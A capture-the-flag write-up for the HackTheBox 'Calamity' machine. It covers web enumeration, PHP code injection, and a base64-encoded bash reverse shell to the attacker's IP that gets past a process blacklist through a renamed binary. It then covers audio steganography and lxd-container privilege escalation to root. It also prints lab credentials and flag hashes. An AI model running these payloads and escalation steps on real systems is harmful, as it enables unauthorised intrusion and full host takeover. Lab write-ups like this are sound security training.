Metadata

  • Platform: HackTheBox
  • CTF: Calamity
  • OS: Linux
  • Difficulty: Hard

Summary

On the exposed website, we can find an admin login panel. Due to the password not in the HTML code of this document, we get access to a web page acting as an HTML code interpreter. Since this page is inadequate secured, we use PHP code to execute system commands, ultimately spawning a reverse shell which bypasses a process blacklist.

Using this foothold, we find several audio files, which contain a user accounts password via steganography. Once the password is extracted, we can access this account and abuse its lxd group membership to spawn a malicious container, granting us root access to the target’s file system.

Solution

Reconnaissance

By using Nmap on the target, we can detect two open ports.

nmap -sC -sV 10.10.10.27 -p- -oN nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 10:43 CET
Nmap scan report for 10.10.10.27
Host is up (0.19s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:46:31:9c:b5:71:c5:96:91:7d:e4:63:16:f9:59:a2 (RSA)
|   256 10:c4:09:b9:48:f1:8c:45:26:ca:f6:e1:c2:dc:36:b9 (ECDSA)
|_  256 a8:bf:dd:c0:71:36:a8:2a:1b:ea:3f:ef:66:99:39:75 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Brotherhood Software
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The only port we can interact with, is the one for the HTTP service. Let’s visit it in a browser.

This looks like a very vague and generic website, informing us that the site is not yet ready. Since there is nothing to find, we should run Gobuster with the hopes of discovering some hidden endpoints.

gobuster dir -u http://10.10.10.27/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.27/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/server-status        (Status: 403) [Size: 299]
/uploads              (Status: 301) [Size: 312] [--> http://10.10.10.27/uploads/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

This scan only discloses the /uploads endpoint. While we can visit this site and get an overview of the directory’s content, it’s empty. Since there is no hit, and other web enumeration procedures do also not yield any results, it is likely that there are some files, which can can only find with their proper extension, due to a missing forward mechanism. To test for these files, we can just add common extension, such as .php. A new scan with Gobuster then indicates the existence of /admin.php.

This page contains a log in panel. Since we don’t have any credentials, we could try to some common/weak default credentials, such as admin:admin. However before we do that, it is worth to check the HTML code of this website, as it may contain some valueable insights.

<html>
<body>
<form method="post">
Password: <input type="text" name="user"><br>
Username: <input type="password" name="pass">
  <input type="submit" value="Log in to the powerful administrator page">
<!-- password is:skoupidotenekes-->
</form> 
</body>
</html>

To our luck, there is a comment disclosing a password! Since the site is called admi.php it is safe to assume that we just discovered the credentials admin:skoupidotenekes, with which we can log into the application.

User Flag

The description on this page already reveals is functionality. Apparently, we can write HTML code into the input field, which will then be executed and reflected to us. According to the developer, this is secure, however this is not the case if we can execute other code the HTML, such as PHP. Let’s test for this but creating a simple Hello World script. If the page exclusively renders Hello World!, the input field proofs to be vulnerable.

<?php
echo "Hello World!";
?>

The output confirms our suspicion! Now it’s time to adjust he PHP payload to navigate on the target’s file system. However, every time I try to spawn a reverse shell, the server will instantly close the connection, independent of the payload. At one time, I was able to transfer a PHP reverse shell file to the target, upload it to the /uploads directory and then execute it by visiting the website. In an afterthought, I am not sure if this was due to an error or the intended path. In any case, we can also find a different way to spawn a shell later on. For the time being, we can enumerate the target manually by issuing OS command with the following payload:

<?php 
system('ls -la'); #Input any command here
?>

Using this restricted enumeration, we can find a folder of the xalvas user in the /home directory. At this point, we could already collect the user flag, however, let’s first focus on getting a stable reverse shell.

ls /home/xalvas/
 
alarmclocks app dontforget.txt intrusions peda recov.wav user.txt 

In the folder, there are a few other files and directories. In intrusions, we can find a log file.

POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-28 04:55:42.796288 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-28 05:22:11.228988 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-28 05:23:23.424719 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-29 02:43:57.083849
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS python ...PROCESS KILLED AT 2017-06-29 02:48:47.909739 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS sh ...PROCESS KILLED AT 2017-06-29 06:25:04.202315
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS sh ...PROCESS KILLED AT 2017-06-29 06:25:04.780685 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS python ...PROCESS KILLED AT 2017-06-29 06:25:06.209358 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-29 12:15:32.329358 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-29 12:15:32.330115 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-29 12:16:10.508710 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS nc ...PROCESS KILLED AT 2017-06-29 12:16:10.510537 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS python3 ...PROCESS KILLED AT 2017-12-24 10:30:28.836132 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS python3 ...PROCESS KILLED AT 2022-07-13 09:38:04.597127 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS bash ...PROCESS KILLED AT 2025-03-26 06:05:05.147224 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS bash ...PROCESS KILLED AT 2025-03-26 06:05:11.178200 
POSSIBLE INTRUSION BY BLACKLISTED PROCCESS bash ...PROCESS KILLED AT 2025-03-26 06:20:18.685788 

From the content of this file, it seems like this is what caused issues earlier. Once a process was started, of which the executable is in some kind of blacklist, the process will be terminated immediately. Based on the process mentioned, this includes bash, python, nc and others. Nevertheless, it looks like we can circumvent this quite easily by copying and renaming one of these executables, as the blacklist will no longer work. As a target folder I choose /var/www/html/uploads, since we have write permissions for this folder. In the following, we will make a renamed copy of bash in order to spawn a reverse shell.

which bash
/bin/bash
cp /bin/bash /var/www/html/uploads/legit2

As a precaution, we can use a base64 encoded basic bash reverse shell, for which we will use our renamed binary.

echo '/var/www/html/uploads/legit2 -i >& /dev/tcp/10.10.16.5/4444 0>&1' | base64 
L3Zhci93d3cvaHRtbC91cGxvYWRzL2xlZ2l0MiAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41LzQ0NDQgMD4mMQo=

Once the encoding completes, it’s possible to input to adapt our payload on the website input field.

<?php  system('echo L3Zhci93d3cvaHRtbC91cGxvYWRzL2xlZ2l0MiAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41LzQ0NDQgMD4mMQo= | base64 -d | /var/www/html/uploads/legit2')  ?>

After the payloads executes, we will receive a reverse shell as www-data to our open Netcat listener. At this point, we can now also claim the user flag.

cb1fbdeb26855af34eac8d7789f055c5

Root Flag

There are a three audio files in this target’s home directory, which are quite unusual findings. Maybe there is something more to them. Let’s copy them into /var/www/html/uploads, so we can easily download them over the website.

Out of three of these audio clips, recov.wav and rick.wav sound identical, since they both play Never Gonna Give You Up - Rick Astley. That on its own is nothing out of the ordinary, however the following command output does not fit into that picture.

diff recov.wav rick.wav   
Binary files recov.wav and rick.wav differ

Even though the files sound the same, they are not, and we should therefore take a closer look at them, since this exploitation step sound very much like we are dealing with some sort of steganography. Upon loading both files into a tool such as Audacity, we can examine each of the files. At this point they still look the same. Since there is likely something embedded in one of these files (I assume in recov.wav due to the name), we can subtract one of the files from the other, leaving only their differences. This can be achieved by loading both files into the same Audacity project, and inverting the sound waves of rick.wav. Afterwards, we are left with one audio track in which a female voice reads some text.

47936..* [long pause] Your password is 185

Due to the long pause in this audio files, we can assume that the audio is a cut-up loop. The password is therefore likely to be 18547936..*. By using xalvas:18547936..*, we can log in over SSH, accessing the user xalvas.

Now we have permissions to access some other directory, which we were not allowed to access as www-data. In the app directory, we can find two files.

ls -la ~/app
total 28
drwxr-x--- 2 root   xalvas  4096 Jul 13  2022 .
drwxr-xr-x 7 xalvas xalvas  4096 Jul 13  2022 ..
-r-sr-xr-x 1 root   root   12584 Jun 29  2017 goodluck
-r--r--r-- 1 root   root    3936 Jun 29  2017 src.c

It’s important to note the set SUID bit of the executable goodluck, which is always dangerous. In case we can exploit this file in any way, our payload will be executed as the root user. As it seems, we also are in possession of the source code src.c. Upon inspection of the code, I highly suspect that this code might be vulnerable to some kind of buffer overflow. However, due to the difficulty rating of this box, I suspect this to not be the only path for privilege escalation. We can confirm this suspicion by taking a look at this user’s groups.

id
uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

This user is part of the lxd group, which is a group famously known for being a privilege escalation vector. Similar to Docker, the tool behind this group can be used to spawn container, which requires sudo privileges. This can be abused to spawn a malicious container, in which we have root access and can mount the target’s file system. To exploit this, we can follow these instructions, which use lxd alpine builder to spawn the malicious container . However, first we need to check the architecture on the target in order to create to correct payload.

uname -a
Linux calamity 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:15:00 UTC 2017 i686 athlon i686 GNU/Linux

Based on this output, we know that we are dealing with an older i686 architecture. After cloning lxd alpine builder onto our machine, we can create the container image for this architecture.

sudo ./build-alpine --arch=i686

The result of this process is alpine.tar.gz. After transferring the archive to the target, either via a python http server or SCP, we can start the exploitation by following the instructions from before.

lxc image import ./alpine.tar.gz --alias myimage
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

At this point, the malicious container is set up. Now we only need to start it and enter it over an interactive shell.

lxc start mycontainer
lxc exec mycontainer /bin/sh

Now to have root access to the target’s file system in /mnt/root, including access to the root flag at /mnt/root/root/root.txt.

01eca84dfa7022a9a5049b1766c98de2